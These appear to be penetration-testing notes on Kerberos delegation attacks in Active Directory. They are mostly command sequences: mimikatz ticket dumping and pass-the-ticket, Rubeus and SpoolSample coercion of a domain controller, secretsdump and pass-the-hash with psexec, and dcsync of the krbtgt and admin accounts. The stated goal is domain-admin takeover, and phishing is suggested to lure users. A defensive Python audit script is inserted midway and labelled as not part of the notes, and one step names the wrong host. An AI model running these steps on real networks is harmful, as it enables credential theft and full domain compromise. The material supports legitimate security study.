Kerberos
Kerberoasting
Check the Imported Ticket
klist
After that you can test it with ls:
ls \\<target machine>\c$
# lists files on the target machine using the imported ticket
Unconstrained Delegation
User
--- authenticates to ---> IIS server
---> authenticates on behalf of the user ---> DB server
Any user authentication (e.g. CIFS) to a computer with unconstrained delegation enabled will cache that user's TGT in memory, where it can later be dumped and reused by an adversary.
Use PowerView.ps1:
Get-DomainComputer -Unconstrained
# search for useraccountcontrol : TRUSTED_FOR_DELEGATION
# name : IIS01 (the host where user TGTs will be cached in memory)
# primarygroupid 515 = Domain Computers, which excludes domain controllers (516), since DCs have unconstrained delegation by default
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
Exploit:
# requires local administrator
mimikatz
mimikatz# privilege::debug
mimikatz# sekurlsa::tickets
We could wait for a user to connect to IIS01, or do a phishing attack to force a user to connect to IIS01.
Then check mimikatz again for the TGT in memory.
Once we have a TGT for OFFENSE.LOCAL/administrator, we have administrator for the entire domain.
Run this command to export the TGT:
mimikatz# sekurlsa::tickets /export

Then import the ticket with mimikatz:
kerberos::ptt [0;3c785]-2-0-40e10000-Administrator@krbtgt-OFFENSE.LOCAL.kirbi
Log in with PsExec or a PSSession:
PsExec.exe \\dc01 cmd
Enter-PSSession dc01
Note:
# check the imported TGT
klist
Constrained Delegation
. .\PowerView.ps1
Get-DomainUser -TrustedToAuth
Get-NetUser -TrustedToAuth
# test this first
Get-DomainComputer -TrustedToAuth
note:
cn (common name) -> the current computer name
msds-allowedtodelegateto -> the target computer (SPNs this account may delegate to)
useraccountcontrol -> TRUSTED_TO_AUTH_FOR_DELEGATION
example: IIS01 is allowed constrained delegation to FILE_01
cn : IIS01
msds-allowedtodelegateto : {cifs/file_01.example.local, cifs/file_01}
useraccountcontrol : TRUSTED_TO_AUTH_FOR_DELEGATION
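As an added audit example (not part of these notes), the following Python decodes the useraccountcontrol flags and msds-allowedtodelegateto values described in the unconstrained and constrained delegation notes above and classifies each computer account's delegation risk. The records are constructed sample data shaped like Get-ADComputer output; the names mirror the notes.

```python
# Added audit helper: classify AD computer accounts by delegation configuration
# using the userAccountControl bit flags and the msDS-AllowedToDelegateTo attribute.
# Records below are constructed sample data shaped like Get-ADComputer output.

TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
WORKSTATION_TRUST_ACCOUNT = 0x1000          # member computer account
DOMAIN_CONTROLLERS_RID = 516                # primaryGroupID of DCs; 515 = Domain Computers


def classify_delegation(record):
    """Return (risk, detail) for one computer-account record."""
    uac = int(record.get("userAccountControl", 0))
    targets = record.get("msDS-AllowedToDelegateTo") or []
    is_dc = bool(uac & SERVER_TRUST_ACCOUNT) or record.get("primaryGroupID") == DOMAIN_CONTROLLERS_RID
    if uac & TRUSTED_FOR_DELEGATION:
        if is_dc:
            return ("expected", "domain controller; unconstrained delegation is the default")
        return ("high", "unconstrained delegation on a member computer: any inbound "
                        "authentication caches the user's TGT on this host")
    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return ("medium", "constrained delegation with protocol transition to: " + ", ".join(targets))
    if targets:
        return ("low", "constrained delegation (Kerberos only) to: " + ", ".join(targets))
    return ("none", "no delegation configured")


def audit(records):
    """Map each record's cn to its classification, for a periodic review."""
    return {r["cn"]: classify_delegation(r) for r in records}


# Constructed sample records (hostnames mirror the notes above).
SAMPLE = [
    {"cn": "IIS01", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "primaryGroupID": 515, "msDS-AllowedToDelegateTo": ["cifs/file_01.example.local", "cifs/file_01"]},
    {"cn": "WEB02", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "primaryGroupID": 515},
    {"cn": "DC01", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "primaryGroupID": 516},
    {"cn": "WS05", "userAccountControl": WORKSTATION_TRUST_ACCOUNT, "primaryGroupID": 515},
]

if __name__ == "__main__":
    for name, (risk, detail) in audit(SAMPLE).items():
        print(f"{name:6} {risk:8} {detail}")
```

Member computers reported as "high" are the ones the Get-ADComputer filter above (primarygroupid 515) is meant to surface.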
Exploit on the computer that has TRUSTED_TO_AUTH_FOR_DELEGATION:
Rubeus.exe tgtdeleg /nowrap
Once you have the Base64 ticket from Rubeus:
# Import Ticket to Kali Linux
# make sure the base64 file is one line.
base64 -d ticket.kirbi.b64 > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/home/kali/ticket.ccache
crackmapexec smb <target hostname> -k
secretsdump.py <domain>/<hostname>\$@<hostname>.<domain> -dc-ip <target ip dc> -no-pass -k
# final step once we have the NTLM hash
psexec.py -hashes <hash>:<hash> administrator@<hostname>
Note:

When accessing Kerberos services, make sure your clock skew is within tolerance:
sudo ntpdate -u <ip server that has ntp server>
DC PrintSpooler
Our environment for this lab is:
ws01 - attacker-compromised host with Kerberos delegation enabled (attacker, server)
dc01 - domain controller running a print service (victim, target)
Check whether the spooler pipe is reachable:
ls \\DC01\pipe\spoolss
dir \\DC01\pipe\spoolss
Before the attack (administrator cmd on the breached computer ws01):
Rubeus.exe monitor /interval:4 /filteruser:DC01$
Then run SpoolSample.exe (from cmd.exe) on IIS01:
# SpoolSample.exe <target server> <capture server>
SpoolSample.exe DC01 ws01
# Rubeus monitor on the capture server receives the TGT
Rubeus could also import the TGT directly to memory:
Rubeus.exe ptt /ticket:<base64 TGT from rubeus>
We indeed got a TGT for the DC01$ computer account. With this, we can make our compromised system ws01$ appear like a Domain Controller and extract an NTLM hash for the user offense\spotless, which we know has high privileges in the domain:
# in this case spotless is domain admin user.
mimikatz # lsadump::dcsync /domain:offense.local /user:spotless
mimikatz # lsadump::dcsync /domain:offense.local /user:krbtgt